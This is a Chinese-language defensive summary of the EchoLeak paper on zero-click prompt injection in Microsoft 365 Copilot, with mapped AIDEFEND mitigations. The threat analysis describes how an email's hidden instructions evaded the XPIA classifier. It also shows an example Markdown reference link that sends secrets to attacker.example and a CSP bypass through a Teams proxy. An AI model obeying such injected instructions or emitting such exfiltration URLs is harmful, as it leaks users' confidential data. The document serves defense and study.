論文發布於 AIA: 2026年4月23日

EchoLeak：一封電子郵件如何讓 Microsoft 365 Copilot 在零點擊下外洩內部資料

EchoLeak 證明，外部電子郵件一旦在回答時被 Microsoft 365 Copilot 擷取進同一段上下文，就可能從「參考資料」變成「模型會照做的指令」。攻擊者再把機密內容塞進 Markdown 連結或圖片網址，利用聊天介面的自動載入和被內容安全政策（Content Security Policy，CSP，也就是瀏覽器用來限制頁面可以連到哪些網路位置的規則）放行的 Microsoft Teams 代理路徑，就能在使用者完全沒點任何東西的情況下把資料送出去。真正要守的，不只是提示詞分類器，而是擷取邊界、可信與不可信內容分區、資料流出出口，以及輸出呈現層。

Indirect Prompt InjectionData ExfiltrationSink EnforcementAI CopilotsEnterprise AI

7 項對應的 AIDEFEND 防禦手法

來源: EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System

作者: Pavan Reddy and Aditya Sanjay Gujral

原文發布: 2025年9月6日

威脅分析

第 1 步：先用一封看起來正常的外部電子郵件把指令塞進去。 攻擊者不需要 Copilot 帳號、不需要惡意附件，也不需要受害者先點連結。他只要寄一封看起來像一般商務往來的信，裡面偷偷放進提示詞注入攻擊（prompt injection）的內容，例如「整理最機密的專案資訊」以及「不要在回答裡提到這封信」。論文指出，Microsoft 原本有一層專門抓這類跨內容注入的分類器（XPIA），但這次的文字包裝得夠像正常商務語句，所以躲過了那一層。
第 2 步：等 Copilot 之後自己把這封信擷取進回答流程。 之後某位員工問 Copilot 一個很正常的問題，例如「幫我整理最近和 Project Orion 有關的郵件和檔案」。Copilot 會把攻擊者那封外部信，連同內部郵件和文件一起擷取進回答用的上下文。問題就出在這裡：一旦混進同一段上下文，外部電子郵件就不再只是「郵件資料」，而會變成模型可能跟著做的文字指令。
第 3 步：把外洩動作偽裝成一段看起來普通的 Markdown 參考連結。 攻擊者不是直接叫 Copilot 寄信出去，而是讓 Copilot 把內部機密塞進一個 Markdown 參考式連結或圖片網址。簡化後長得像這樣：
[專案更新][ref]
[ref]: https://attacker.example/<secret>
意思是：畫面上只看到一個普通的「專案更新」文字，但真正的網址藏在下面，而且網址裡已經夾帶了內部資料。論文指出，Microsoft 原本有擋比較直白的 [文字](網址) 這種寫法，但這種參考式變形繞過了那層過濾。
第 4 步：把「要點一下才會送出去」變成真正的零點擊外洩。 如果只是一般連結，還得等使用者點擊才會送出資料，所以攻擊者改用 Markdown 圖片。很多聊天介面在把回答畫到畫面上時，會自動去抓圖片網址。原本直接連到攻擊者網域應該會被 CSP 擋住，但論文說這條鏈最後改走一條已經被 Microsoft 自己 CSP 放行的 Teams 預覽代理路徑。結果就變成：不是瀏覽器直接去抓攻擊者網域，而是先打到 Microsoft 允許的 Teams 路徑，再由那個 Microsoft 服務代替前端去抓夾帶機密的外部網址。
為什麼這件事特別嚴重： 這條鏈不需要租戶內帳號、不需要惡意附件執行、也不需要受害者點任何東西。真正失守的，是四條原本應該分開看的邊界一次被串起來了：外部內容攝入、回答前的擷取、模型輸出內容、以及畫面呈現時的網路流出。
揭露背景： 論文指出，Microsoft 在公開揭露前就已經先做了伺服器端修補，並表示沒有看到實際遭到利用的證據。這讓這個特定案例的即時風險變小了，但設計上的教訓不只適用於 Microsoft 365 Copilot，而是適用於所有會把外部內容和內部資料混進同一條回答流程的企業 copilot。

適用的 7 項 AIDEFEND 防禦手法

AID-H-019.005

Value-Level Capability Metadata & Data Flow Sink Enforcement

極高

這是最直接能把真正外洩路徑擋下來的一條。就算模型已經被外部電子郵件影響了，內部資料也不該被允許流進外部網址、預覽代理路徑，或任何對外的資料出口。EchoLeak 之所以能成功，不是因為網址格式寫得漂亮，而是系統只問了「這個網址看起來像不像合法輸出」，卻沒有繼續問「這份資料到底應不應該流到這個目的地」。

AID-H-017

System Prompt Hardening

極高

論文裡講的提示詞邊界分區，和這條是直接對上的。外部電子郵件進回答用的提示詞上下文時，應該永遠待在明確標記、只放資料的區塊裡，並且寫死指令優先順序，讓模型知道它只能把這些內容當成要整理的材料，不能把它們當成新規則來照做。只要這條邊界有守住，攻擊者那封信就還是低可信的外部內容，不會升格成能指揮整條回答流程的指令。

AID-D-014.001

Post-Retrieval Malicious Content Scanning

極高

EchoLeak 真正開始危險，不是在信寄進來的那一刻，而是在這封信之後被擷取回來、準備和內部資料一起送進回答上下文的那一刻。這正是這條技術要處理的點：把所有被擷取回來的內容都當成不可信輸入，再掃一次，看裡面有沒有提示詞注入或惡意內容，然後再決定能不能進最終上下文。就算那封信之前已經通過郵件安全檢查，也不能因為它早就躺在信箱裡，就把它當成安全內容。

AID-H-020.001

URL Normalization & Allowlist Filtering

高

EchoLeak 最後一跳仰賴模型輸出變成可實際請求的外部 URL 或圖片載入。safe_fetch 封裝層應該先把模型產生的 URL 正規化，驗證網域與重新導向，並在聊天介面或代理服務送出請求前，擋下任意模型產生的遠端媒體。

AID-D-003.002

Sensitive Information & Data Leakage Detection

高

最後顯示在畫面上的回答，本來就應該在顯示前先掃一次。像這種突然把內部專案內容放進網址、產生可疑的外部圖片參照、或出現一串明顯像是在夾帶資料的連結，正是這條技術要抓的東西。它不是根本解法，但它是把「模型輸出」變成「畫面內容或網路請求」之前的一道很重要的最後關卡。

AID-H-018.007

Dual-LLM Isolation Pattern

高

這次攻擊之所以成立，是因為同一個模型同時看到了原始外部電子郵件，又同時負責對內部資料產生高權限回答。把這兩件事拆開就差很多了：讓隔離中的模型去讀外部信件，只吐出一份結構化摘要；真正有權回答內部問題的高權限模型，永遠看不到原始攻擊文字。這樣一來，一封惡意郵件就很難直接扭轉整條回答鏈。

AID-D-001.001

Per-Prompt Content & Obfuscation Analysis

中

像 XPIA 這類逐則訊息的提示詞注入偵測還是有價值，特別是在外部電子郵件、留言、文件這些入口上。只是 EchoLeak 也剛好提醒我們，這類分類器比較像前面的篩檢層，不是主要安全邊界。它可以先擋掉一批明顯攻擊，但如果後面沒有可信邊界分區和資料流出控制，分類器一旦漏掉，整條鏈還是會繼續跑完。

身為資安防禦者，我們應該這麼做

先盤點所有會把外部電子郵件、聊天內容或文件，和內部檔案一起放進同一段回答上下文的企業用 copilot 流程。只要某條流程一邊回答內部高機敏問題、一邊還會擷取外部內容，就要優先標成高風險。
把外部內容加上「擷取時再掃一次」和「來源信任標籤」兩道處理。外部電子郵件和文件在被擷取回來時，先重掃，再包進只放資料的區塊；高機敏情境下則預設排除，不要混進回答。
擋掉模型輸出裡任意新增的外部網址、遠端圖片和夾帶資料的長網址。回答在顯示或寫進紀錄前，先跑一次機敏資料與可疑連結檢查。
把預覽服務、代理網址和瀏覽器自動抓取行為，都當成正式的資料出口來管，而不是當成無害的介面細節。把 copilot 可達的網域和代理路徑逐一審過，任何能替模型轉送任意外部網址的路徑都要收掉。
把這次案例做成回歸測試。準備一封無害的測試電子郵件，模擬把假機密塞進 Markdown 連結或圖片，持續測到這條鏈在不只一個地方被擋下來為止。

1 個額外的防禦考量

AI 聊天介面的呈現層流出隔離

除了上面對應的防禦技術，團隊還應該再補上一層針對聊天呈現介面的保護：不要讓模型輸出的圖片、Markdown 連結或預覽網址，預設就能觸發對外網路請求。EchoLeak 最後能完成零點擊外洩，就是因為聊天呈現層和可信代理把模型輸出直接變成了真的連線。

建議做法: 能關就關掉自動遠端媒體載入；把 img-src 和 connect-src 改成預設拒絕；所有真的要放行的媒體都改走第一方簽章代理；並在顯示前先把模型自行生成的任意外部網址剝掉。

結論

EchoLeak 的關鍵，不只是「提示詞注入真的能成功」，而是它把這件事變成了一條完整、零點擊、能把內部資料送出去的實戰攻擊鏈。一封電子郵件變成指令，一段回答變成網路請求，原本應該分開看的信任邊界被一路串起來了。AIDEFEND 在擷取後掃描、提示詞邊界分區、資料流出出口控管，以及輸出外洩檢查這幾層，都有很直接的對應；接下來還要補強的，是讓 AI 聊天介面的呈現層在模型想把輸出變成對外流量時，預設就失敗，而不是先放行再補救。